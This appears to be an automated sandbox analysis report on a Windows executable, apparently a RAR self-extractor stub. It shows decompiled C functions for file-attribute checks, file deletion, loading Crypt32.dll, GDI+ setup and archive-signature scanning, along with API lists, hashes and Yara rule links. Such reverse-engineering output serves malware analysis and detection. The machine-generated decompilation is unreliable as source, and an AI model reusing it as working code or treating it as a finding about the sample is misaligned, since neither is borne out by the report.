                            • DeleteFileW.KERNEL32(?,?,?,00000800,?,?,009E9648,?,?,009E94A3), ref: 009E9E57
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: DeleteFile
                            • String ID:
                            • API String ID: 4033686569-0
                            • Opcode ID: bbcab683b8217242fd0fe594441672c9439b271f6d34fee91434630d746b5c09
                            • Instruction ID: e8685437bdc98d9a9e996018fcab907e22cac7930996d576bf56a6ce095a9569
                            • Opcode Fuzzy Hash: bbcab683b8217242fd0fe594441672c9439b271f6d34fee91434630d746b5c09
                            • Instruction Fuzzy Hash: 4BE092315422496BDB02DFA1DC45FEA775CAB083C1F8880A6B988C2151DB71DDE5EA60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009E9E7F, Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E009E9E7F(WCHAR* _a4) {
				short _v4100;
				long _t6;
				long _t11;
				long _t13;

				E009FD940();
				_t6 = GetFileAttributesW(_a4); // executed
				_t13 = _t6;
				if(_t13 == 0xffffffff && E009EB32C(_a4,  &_v4100, 0x800) != 0) {
					_t11 = GetFileAttributesW( &_v4100); // executed
					_t13 = _t11;
				}
				return _t13;
			}







                            0x009e9e87
                            0x009e9e90
                            0x009e9e96
                            0x009e9e9b
                            0x009e9ebc
                            0x009e9ec2
                            0x009e9ec2
                            0x009e9eca

                            APIs
                            • GetFileAttributesW.KERNELBASE(?,?,?,009E9E74,?,009E74F7,?,?,?,?), ref: 009E9E90
                            • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,009E9E74,?,009E74F7,?,?,?,?), ref: 009E9EBC
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: AttributesFile
                            • String ID:
                            • API String ID: 3188754299-0
                            • Opcode ID: c73623fc8d97f0b086f350c13d4d9456826d98037ca693f5fb03125c3f5bfe0d
                            • Instruction ID: 456c90199073f4a00c1b8397c6cdaf985887324222469b76ad4dfbd6dabfdef4
                            • Opcode Fuzzy Hash: c73623fc8d97f0b086f350c13d4d9456826d98037ca693f5fb03125c3f5bfe0d
                            • Instruction Fuzzy Hash: D2E09B3150115857CB11EBA5DC05BE9776C9B0C3E1F004361FE54D3291D7709D5587D0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009EFCFD, Relevance: 3.0, APIs: 2, Instructions: 25libraryCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E009EFCFD(intOrPtr _a4) {
				short _v4100;
				struct HINSTANCE__* _t7;

				E009FD940();
				_t7 = GetSystemDirectoryW( &_v4100, 0x800);
				if(_t7 != 0) {
					E009EB625( &_v4100, _a4,  &_v4100, 0x800);
					_t7 = LoadLibraryW( &_v4100); // executed
				}
				return _t7;
			}





                            0x009efd05
                            0x009efd18
                            0x009efd20
                            0x009efd2e
                            0x009efd3a
                            0x009efd3a
                            0x009efd44

                            APIs
                            • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 009EFD18
                            • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,009EE7F6,Crypt32.dll,?,009EE878,?,009EE85C,?,?,?,?), ref: 009EFD3A
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: DirectoryLibraryLoadSystem
                            • String ID:
                            • API String ID: 1175261203-0
                            • Opcode ID: 53516ece0106070454282a79e659e802680c8fac12738fe49e3904298af37053
                            • Instruction ID: bf72e1e1c8b64b1e26261b9fc88a032dd51290bbc2dc6b8a668d6be691106110
                            • Opcode Fuzzy Hash: 53516ece0106070454282a79e659e802680c8fac12738fe49e3904298af37053
                            • Instruction Fuzzy Hash: D1E0127690115C6ADB11DAD59C08FEA776CEF4D391F4440A6B948D2004DA74DD90CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009F938E, Relevance: 3.0, APIs: 2, Instructions: 24windowCOMMON
                            Download Yara Rule
                            C-Code - Quality: 73%
                            			E009F938E(signed int __ecx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int* _t10;
				signed int _t15;

				_push(__ecx);
				_t15 = __ecx;
				_t10 =  &_v8;
				_v8 = __ecx;
				_v8 = _v8 & 0x00000000;
				_push(_t10);
				_push(_a4);
				 *__ecx = 0xa13398;
				if(_a8 == 0) {
					L009FD80E(); // executed
				} else {
					L009FD814();
				}
				 *((intOrPtr*)(_t15 + 8)) = _t10;
				 *(_t15 + 4) = _v8;
				return _t15;
			}






                            0x009f9391
                            0x009f9393
                            0x009f9395
                            0x009f9398
                            0x009f939b
                            0x009f93a3
                            0x009f93a4
                            0x009f93a7
                            0x009f93ad
                            0x009f93b6
                            0x009f93af
                            0x009f93af
                            0x009f93af
                            0x009f93bb
                            0x009f93c1
                            0x009f93ca

                            APIs
                            • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 009F93AF
                            • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 009F93B6
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: BitmapCreateFromGdipStream
                            • String ID:
                            • API String ID: 1918208029-0
                            • Opcode ID: f70594e8bf151918624d52f2401da8cb85234017f28d73cf3dcb82e957604ad9
                            • Instruction ID: 6a7c3ccaa42a3d91ffcb2d68573d655423fe5d34f7dd7ce44410c6308d30ab78
                            • Opcode Fuzzy Hash: f70594e8bf151918624d52f2401da8cb85234017f28d73cf3dcb82e957604ad9
                            • Instruction Fuzzy Hash: 52E06D7180121CEBCB20DF98C5057A9BBF8EB04360F10805AF94593200D7B1AE049BA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009F9B08, Relevance: 3.0, APIs: 2, Instructions: 22comCOMMON
                            Download Yara Rule
                            C-Code - Quality: 58%
                            			E009F9B08(void* __ecx) {
				intOrPtr _v16;
				intOrPtr* _t5;
				void* _t7;
				void* _t11;
				intOrPtr _t14;

				 *[fs:0x0] = _t14;
				_t5 =  *0xa275c0; // 0x763cc100
				 *((intOrPtr*)( *_t5 + 8))(_t5, _t11,  *[fs:0x0], E00A11161, 0xffffffff);
				L009FD826(); // executed
				_t7 =  *0xa1dff0( *((intOrPtr*)(__ecx + 4))); // executed
				 *[fs:0x0] = _v16;
				return _t7;
			}








                            0x009f9b19
                            0x009f9b20
                            0x009f9b2b
                            0x009f9b31
                            0x009f9b36
                            0x009f9b3f
                            0x009f9b4a

                            APIs
                            • GdiplusShutdown.GDIPLUS(?,?,?,00A11161,000000FF), ref: 009F9B31
                            • OleUninitialize.OLE32(?,?,?,00A11161,000000FF), ref: 009F9B36
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: GdiplusShutdownUninitialize
                            • String ID:
                            • API String ID: 3856339756-0
                            • Opcode ID: 56d2559a5e68775089f547632f1892de69ac65aee22e0292fe4be2d89def8c7b
                            • Instruction ID: b6581bfa017be87a507936cb86ab0398fa02186e6aa96c5bcc01343a28e816b5
                            • Opcode Fuzzy Hash: 56d2559a5e68775089f547632f1892de69ac65aee22e0292fe4be2d89def8c7b
                            • Instruction Fuzzy Hash: 33E01A32548654AFC720DB88DC46B56F7A8FB49B20F004769BA1A83B50CB756801CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A01726, Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                            Download Yara Rule
                            C-Code - Quality: 89%
                            			E00A01726(void* __ecx, void* __eflags) {
				intOrPtr _t1;
				void* _t2;
				void* _t9;

				_t1 = E00A0281A(__eflags, E00A0166A); // executed
				 *0xa1d680 = _t1;
				if(_t1 != 0xffffffff) {
					_t2 = E00A028C8(__eflags, _t1, 0xa401dc);
					_pop(_t9);
					__eflags = _t2;
					if(_t2 != 0) {
						return 1;
					} else {
						E00A01759(_t9);
						goto L1;
					}
				} else {
					L1:
					return 0;
				}
			}






                            0x00a0172b
                            0x00a01730
                            0x00a01739
                            0x00a01744
                            0x00a0174a
                            0x00a0174b
                            0x00a0174d
                            0x00a01758
                            0x00a0174f
                            0x00a0174f
                            0x00000000
                            0x00a0174f
                            0x00a0173b
                            0x00a0173b
                            0x00a0173d
                            0x00a0173d

                            APIs
                              • Part of subcall function 00A0281A: try_get_function.LIBVCRUNTIME ref: 00A0282F
                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00A01744
                            • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00A0174F
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                            • String ID:
                            • API String ID: 806969131-0
                            • Opcode ID: 7536efe6e9a1cb69c888f8076d16e77a749bed423fbd71a8e3a1689ef10b945c
                            • Instruction ID: 9e9bf9f8c169b38d7590bf3a60c88a97df317ee3f0b2caeac55ce27e8032a8d9
                            • Opcode Fuzzy Hash: 7536efe6e9a1cb69c888f8076d16e77a749bed423fbd71a8e3a1689ef10b945c
                            • Instruction Fuzzy Hash: 71D0A929A5430D28CE042BB47912AC91748A8527783F08B56F020AA0C2EB70800A7A25
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009E12B2, Relevance: 3.0, APIs: 2, Instructions: 11COMMON
                            Download Yara Rule
                            C-Code - Quality: 58%
                            			E009E12B2(struct HWND__* _a4, int _a8, signed char _a12) {
				int _t8;

				asm("sbb eax, eax");
				_t8 = ShowWindow(GetDlgItem(_a4, _a8),  ~(_a12 & 0x000000ff) & 0x00000009); // executed
				return _t8;
			}




                            0x009e12b9
                            0x009e12ce
                            0x009e12d4

                            APIs
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: ItemShowWindow
                            • String ID:
                            • API String ID: 3351165006-0
                            • Opcode ID: 5db79fbeff06c1afd223458262cc118d6993bbbc712fd985fab1629b0fd9ad95
                            • Instruction ID: b562f7c346db2464b3d417c1c28974b59fe504252c84a992ebcb9c0d0a232ec5
                            • Opcode Fuzzy Hash: 5db79fbeff06c1afd223458262cc118d6993bbbc712fd985fab1629b0fd9ad95
                            • Instruction Fuzzy Hash: 06C01272058210BECB019BB4DC09D6EBBA8ABA4212F06C908B0A6C00A0C238C212DB11
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009E1973, Relevance: 1.8, APIs: 1, Instructions: 285COMMON
                            Download Yara Rule
                            C-Code - Quality: 95%
                            			E009E1973(intOrPtr* __ecx, intOrPtr __edx) {
				signed int _t106;
				intOrPtr _t109;
				signed int _t110;
				signed int _t112;
				signed int _t116;
				signed int _t119;
				signed int _t127;
				intOrPtr _t128;
				char _t129;
				char _t138;
				intOrPtr _t143;
				signed int _t144;
				signed int _t145;
				void* _t147;
				signed int _t152;
				signed int _t153;
				signed int _t155;
				void* _t159;
				void* _t160;
				signed int _t166;
				intOrPtr* _t169;
				signed int _t175;
				void* _t176;
				signed int _t178;
				char* _t190;
				intOrPtr _t191;
				intOrPtr _t197;
				intOrPtr* _t199;
				signed int _t202;
				void* _t204;
				char* _t205;
				intOrPtr _t206;
				void* _t207;

				_t197 = __edx;
				_t169 = __ecx;
				E009FD870(E00A11451, _t207);
				_t199 = _t169;
				_push(7);
				_t164 = _t199 + 0x21f8;
				_push(_t199 + 0x21f8);
				 *((char*)(_t199 + 0x6cbc)) = 0;
				 *((char*)(_t199 + 0x6cc4)) = 0;
				if( *((intOrPtr*)( *_t199 + 0xc))() == 7) {
					 *(_t199 + 0x6cc0) =  *(_t199 + 0x6cc0) & 0x00000000;
					_t106 = E009E1D09(_t164, 7);
					__eflags = _t106;
					if(_t106 == 0) {
						E009E6ED7(_t207 - 0x38, 0x200000);
						 *(_t207 - 4) =  *(_t207 - 4) & 0x00000000;
						_t109 =  *((intOrPtr*)( *_t199 + 0x14))();
						_t197 =  *_t199;
						 *((intOrPtr*)(_t207 - 0x18)) = _t109;
						_t110 =  *((intOrPtr*)(_t197 + 0xc))( *((intOrPtr*)(_t207 - 0x38)),  *((intOrPtr*)(_t207 - 0x34)) + 0xfffffff0);
						_t175 = _t110;
						_t202 = 0;
						 *(_t207 - 0x14) = _t175;
						_t166 = 1;
						__eflags = _t175;
						if(_t175 <= 0) {
							L22:
							__eflags =  *(_t199 + 0x6cc0);
							_t176 = _t207 - 0x38;
							if( *(_t199 + 0x6cc0) != 0) {
								_t37 = _t207 - 4; // executed
								 *_t37 =  *(_t207 - 4) | 0xffffffff;
								__eflags =  *_t37;
								E009E159C(_t176); // executed
								L25:
								_t112 =  *(_t199 + 0x6cb0);
								__eflags = _t112 - 4;
								if(__eflags != 0) {
									__eflags = _t112 - 3;
									if(_t112 != 3) {
										 *((intOrPtr*)(_t199 + 0x2200)) = 7;
										L32:
										 *((char*)(_t207 - 0xd)) = 0;
										__eflags = E009E391A(_t199, _t197);
										 *(_t207 - 0xe) = 0;
										__eflags = 0 - 1;
										if(0 != 1) {
											L38:
											_t116 =  *((intOrPtr*)(_t207 - 0xd));
											L39:
											_t178 =  *((intOrPtr*)(_t199 + 0x6cc5));
											__eflags = _t178;
											if(_t178 == 0) {
												L41:
												__eflags =  *((char*)(_t199 + 0x6cc4));
												if( *((char*)(_t199 + 0x6cc4)) != 0) {
													L43:
													__eflags = _t178;
													if(__eflags == 0) {
														E009E134C(__eflags, 0x1b, _t199 + 0x1e);
													}
													__eflags =  *((char*)(_t207 + 8));
													if( *((char*)(_t207 + 8)) != 0) {
														L48:
														__eflags =  *(_t207 - 0xe);
														 *((char*)(_t199 + 0x6cb6)) =  *((intOrPtr*)(_t199 + 0x2224));
														if( *(_t207 - 0xe) == 0) {
															L69:
															__eflags =  *((char*)(_t199 + 0x6cb5));
															if( *((char*)(_t199 + 0x6cb5)) == 0) {
																L71:
																E009EFAB1(_t199 + 0x6cfa, _t199 + 0x1e, 0x800);
																L72:
																_t119 = _t166;
																goto L73;
															}
															__eflags =  *((char*)(_t199 + 0x6cb9));
															if( *((char*)(_t199 + 0x6cb9)) == 0) {
																goto L72;
															}
															goto L71;
														}
														__eflags =  *((char*)(_t199 + 0x21e0));
														if( *((char*)(_t199 + 0x21e0)) == 0) {
															L51:
															_t204 =  *((intOrPtr*)( *_t199 + 0x14))();
															 *((intOrPtr*)(_t207 - 0x24)) = _t197;
															 *((intOrPtr*)(_t207 + 8)) =  *((intOrPtr*)(_t199 + 0x6ca0));
															 *((intOrPtr*)(_t207 - 0x18)) =  *((intOrPtr*)(_t199 + 0x6ca4));
															 *(_t207 - 0x14) =  *(_t199 + 0x6ca8);
															 *((intOrPtr*)(_t207 - 0x1c)) =  *((intOrPtr*)(_t199 + 0x6cac));
															 *((intOrPtr*)(_t207 - 0x20)) =  *((intOrPtr*)(_t199 + 0x21dc));
															while(1) {
																_t127 = E009E391A(_t199, _t197);
																__eflags = _t127;
																if(_t127 == 0) {
																	break;
																}
																_t128 =  *((intOrPtr*)(_t199 + 0x21dc));
																__eflags = _t128 - 3;
																if(_t128 != 3) {
																	__eflags = _t128 - 2;
																	if(_t128 == 2) {
																		__eflags =  *((char*)(_t199 + 0x6cb5));
																		if( *((char*)(_t199 + 0x6cb5)) == 0) {
																			L66:
																			_t129 = 0;
																			__eflags = 0;
																			L67:
																			 *((char*)(_t199 + 0x6cb9)) = _t129;
																			L68:
																			 *((intOrPtr*)(_t199 + 0x6ca0)) =  *((intOrPtr*)(_t207 + 8));
																			 *((intOrPtr*)(_t199 + 0x6ca4)) =  *((intOrPtr*)(_t207 - 0x18));
																			 *(_t199 + 0x6ca8) =  *(_t207 - 0x14);
																			 *((intOrPtr*)(_t199 + 0x6cac)) =  *((intOrPtr*)(_t207 - 0x1c));
																			 *((intOrPtr*)(_t199 + 0x21dc)) =  *((intOrPtr*)(_t207 - 0x20));
																			 *((intOrPtr*)( *_t199 + 0x10))(_t204,  *((intOrPtr*)(_t207 - 0x24)), 0);
																			goto L69;
																		}
																		__eflags =  *((char*)(_t199 + 0x3318));
																		if( *((char*)(_t199 + 0x3318)) != 0) {
																			goto L66;
																		}
																		_t129 = _t166;
																		goto L67;
																	}
																	__eflags = _t128 - 5;
																	if(_t128 == 5) {
																		goto L68;
																	}
																	L60:
																	E009E1E3B(_t199);
																	continue;
																}
																__eflags =  *((char*)(_t199 + 0x6cb5));
																if( *((char*)(_t199 + 0x6cb5)) == 0) {
																	L56:
																	_t138 = 0;
																	__eflags = 0;
																	L57:
																	 *((char*)(_t199 + 0x6cb9)) = _t138;
																	goto L60;
																}
																__eflags =  *((char*)(_t199 + 0x5668));
																if( *((char*)(_t199 + 0x5668)) != 0) {
																	goto L56;
																}
																_t138 = _t166;
																goto L57;
															}
															goto L68;
														}
														__eflags =  *((char*)(_t199 + 0x6cbc));
														if( *((char*)(_t199 + 0x6cbc)) != 0) {
															goto L69;
														}
														goto L51;
													} else {
														L46:
														_t119 = 0;
														L73:
														L74:
														 *[fs:0x0] =  *((intOrPtr*)(_t207 - 0xc));
														return _t119;
													}
												}
												__eflags = _t116;
												if(_t116 != 0) {
													goto L48;
												}
												goto L43;
											}
											__eflags =  *((char*)(_t207 + 8));
											if( *((char*)(_t207 + 8)) == 0) {
												goto L46;
											}
											goto L41;
										}
										__eflags = 0;
										 *((char*)(_t207 - 0xd)) = 0;
										while(1) {
											E009E1E3B(_t199);
											_t143 =  *((intOrPtr*)(_t199 + 0x21dc));
											__eflags = _t143 - _t166;
											if(_t143 == _t166) {
												break;
											}
											__eflags =  *((char*)(_t199 + 0x21e0));
											if( *((char*)(_t199 + 0x21e0)) == 0) {
												L37:
												_t144 = E009E391A(_t199, _t197);
												__eflags = _t144;
												_t145 = _t144 & 0xffffff00 | _t144 != 0x00000000;
												 *(_t207 - 0xe) = _t145;
												__eflags = _t145 - 1;
												if(_t145 == 1) {
													continue;
												}
												goto L38;
											}
											__eflags = _t143 - 4;
											if(_t143 == 4) {
												break;
											}
											goto L37;
										}
										_t116 = _t166;
										goto L39;
									}
									_t205 = _t199 + 0x21ff;
									_t147 =  *((intOrPtr*)( *_t199 + 0xc))(_t205, _t166);
									__eflags = _t147 - _t166;
									if(_t147 != _t166) {
										goto L46;
									}
									__eflags =  *_t205;
									if( *_t205 != 0) {
										goto L46;
									}
									 *((intOrPtr*)(_t199 + 0x2200)) = 8;
									goto L32;
								}
								E009E134C(__eflags, 0x3c, _t199 + 0x1e);
								goto L46;
							}
							E009E159C(_t176);
							goto L46;
						} else {
							goto L6;
						}
						do {
							L6:
							_t190 =  *((intOrPtr*)(_t207 - 0x38)) + _t202;
							__eflags =  *_t190 - 0x52;
							if( *_t190 != 0x52) {
								goto L17;
							}
							_t152 = E009E1D09(_t190, _t110 - _t202);
							__eflags = _t152;
							if(_t152 == 0) {
								L16:
								_t110 =  *(_t207 - 0x14);
								goto L17;
							}
							_t191 =  *((intOrPtr*)(_t207 - 0x18));
							 *(_t199 + 0x6cb0) = _t152;
							__eflags = _t152 - _t166;
							if(_t152 != _t166) {
								L19:
								_t197 =  *_t199;
								_t153 = _t202 + _t191;
								 *(_t199 + 0x6cc0) = _t153;
								 *((intOrPtr*)(_t197 + 0x10))(_t153, 0, 0);
								_t155 =  *(_t199 + 0x6cb0);
								__eflags = _t155 - 2;
								if(_t155 == 2) {
									L21:
									 *((intOrPtr*)( *_t199 + 0xc))(_t199 + 0x21f8, 7);
									goto L22;
								}
								__eflags = _t155 - 3;
								if(_t155 != 3) {
									goto L22;
								}
								goto L21;
							}
							__eflags = _t202;
							if(_t202 <= 0) {
								goto L19;
							}
							__eflags = _t191 - 0x1c;
							if(_t191 >= 0x1c) {
								goto L19;
							}
							__eflags =  *(_t207 - 0x14) - 0x1f;
							if( *(_t207 - 0x14) <= 0x1f) {
								goto L19;
							}
							_t159 =  *((intOrPtr*)(_t207 - 0x38)) - _t191;
							__eflags =  *((char*)(_t159 + 0x1c)) - 0x52;
							if( *((char*)(_t159 + 0x1c)) != 0x52) {
								goto L16;
							}
							__eflags =  *((char*)(_t159 + 0x1d)) - 0x53;
							if( *((char*)(_t159 + 0x1d)) != 0x53) {
								goto L16;
							}
							__eflags =  *((char*)(_t159 + 0x1e)) - 0x46;
							if( *((char*)(_t159 + 0x1e)) != 0x46) {
								goto L16;
							}
							__eflags =  *((char*)(_t159 + 0x1f)) - 0x58;
							if( *((char*)(_t159 + 0x1f)) == 0x58) {
								goto L19;
							}
							goto L16;
							L17:
							_t202 = _t202 + 1;
							__eflags = _t202 - _t110;
						} while (_t202 < _t110);
						goto L22;
					}
					 *(_t199 + 0x6cb0) = _t106;
					_t166 = 1;
					__eflags = _t106 - 1;
					if(_t106 == 1) {
						_t206 =  *_t199;
						_t160 =  *((intOrPtr*)(_t206 + 0x14))(0);
						asm("sbb edx, 0x0");
						 *((intOrPtr*)(_t206 + 0x10))(_t160 - 7, _t197);
					}
					goto L25;
				}
				_t119 = 0;
				goto L74;
			}




































                            0x009e1973
                            0x009e1973
                            0x009e1978
                            0x009e1982
                            0x009e1984
                            0x009e1988
                            0x009e198e
                            0x009e198f
                            0x009e1996
                            0x009e19a3
                            0x009e19ac
                            0x009e19b7
                            0x009e19bc
                            0x009e19be
                            0x009e19f4
                            0x009e19fd
                            0x009e1a01
                            0x009e1a07
                            0x009e1a12
                            0x009e1a15
                            0x009e1a1a
                            0x009e1a1c
                            0x009e1a1e
                            0x009e1a21
                            0x009e1a22
                            0x009e1a24
                            0x009e1ab9
                            0x009e1ab9
                            0x009e1ac0
                            0x009e1ac3
                            0x009e1acf
                            0x009e1acf
                            0x009e1acf
                            0x009e1ad3
                            0x009e1ad8
                            0x009e1ad8
                            0x009e1ade
                            0x009e1ae1
                            0x009e1af3
                            0x009e1af6
                            0x009e1b24
                            0x009e1b2e
                            0x009e1b32
                            0x009e1b3a
                            0x009e1b3f
                            0x009e1b42
                            0x009e1b44
                            0x009e1b7d
                            0x009e1b7d
                            0x009e1b80
                            0x009e1b80
                            0x009e1b86
                            0x009e1b88
                            0x009e1b90
                            0x009e1b90
                            0x009e1b97
                            0x009e1b9d
                            0x009e1b9d
                            0x009e1b9f
                            0x009e1ba7
                            0x009e1ba7
                            0x009e1bac
                            0x009e1bb0
                            0x009e1bbd
                            0x009e1bbd
                            0x009e1bc7
                            0x009e1bcd
                            0x009e1cc5
                            0x009e1cc5
                            0x009e1ccc
                            0x009e1cd7
                            0x009e1ce7
                            0x009e1cec
                            0x009e1cec
                            0x00000000
                            0x009e1cec
                            0x009e1cce
                            0x009e1cd5
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009e1cd5
                            0x009e1bd3
                            0x009e1bda
                            0x009e1be9
                            0x009e1bf0
                            0x009e1bf2
                            0x009e1bfb
                            0x009e1c04
                            0x009e1c0d
                            0x009e1c16
                            0x009e1c1f
                            0x009e1c60
                            0x009e1c62
                            0x009e1c67
                            0x009e1c69
                            0x00000000
                            0x00000000
                            0x009e1c24
                            0x009e1c2a
                            0x009e1c2d
                            0x009e1c4f
                            0x009e1c52
                            0x009e1c6d
                            0x009e1c74
                            0x009e1c83
                            0x009e1c83
                            0x009e1c83
                            0x009e1c85
                            0x009e1c85
                            0x009e1c8b
                            0x009e1c90
                            0x009e1c99
                            0x009e1ca2
                            0x009e1cab
                            0x009e1cb9
                            0x009e1cc2
                            0x00000000
                            0x009e1cc2
                            0x009e1c76
                            0x009e1c7d
                            0x00000000
                            0x00000000
                            0x009e1c7f
                            0x00000000
                            0x009e1c7f
                            0x009e1c54
                            0x009e1c57
                            0x00000000
                            0x00000000
                            0x009e1c59
                            0x009e1c5b
                            0x00000000
                            0x009e1c5b
                            0x009e1c2f
                            0x009e1c36
                            0x009e1c45
                            0x009e1c45
                            0x009e1c45
                            0x009e1c47
                            0x009e1c47
                            0x00000000
                            0x009e1c47
                            0x009e1c38
                            0x009e1c3f
                            0x00000000
                            0x00000000
                            0x009e1c41
                            0x00000000
                            0x009e1c41
                            0x00000000
                            0x009e1c6b
                            0x009e1bdc
                            0x009e1be3
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009e1bb2
                            0x009e1bb2
                            0x009e1bb2
                            0x009e1cee
                            0x009e1cef
                            0x009e1cf4
                            0x009e1cfe
                            0x009e1cfe
                            0x009e1bb0
                            0x009e1b99
                            0x009e1b9b
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009e1b9b
                            0x009e1b8a
                            0x009e1b8e
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009e1b8e
                            0x009e1b46
                            0x009e1b48
                            0x009e1b4b
                            0x009e1b4d
                            0x009e1b52
                            0x009e1b58
                            0x009e1b5a
                            0x00000000
                            0x00000000
                            0x009e1b5c
                            0x009e1b63
                            0x009e1b6a
                            0x009e1b6c
                            0x009e1b71
                            0x009e1b73
                            0x009e1b76
                            0x009e1b79
                            0x009e1b7b
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009e1b7b
                            0x009e1b65
                            0x009e1b68
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009e1b68
                            0x009e1bb9
                            0x00000000
                            0x009e1bb9
                            0x009e1afa
                            0x009e1b04
                            0x009e1b07
                            0x009e1b09
                            0x00000000
                            0x00000000
                            0x009e1b0f
                            0x009e1b12
                            0x00000000
                            0x00000000
                            0x009e1b18
                            0x00000000
                            0x009e1b18
                            0x009e1ae9
                            0x00000000
                            0x009e1ae9
                            0x009e1ac5
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009e1a2a
                            0x009e1a2a
                            0x009e1a2d
                            0x009e1a2f
                            0x009e1a32
                            0x00000000
                            0x00000000
                            0x009e1a38
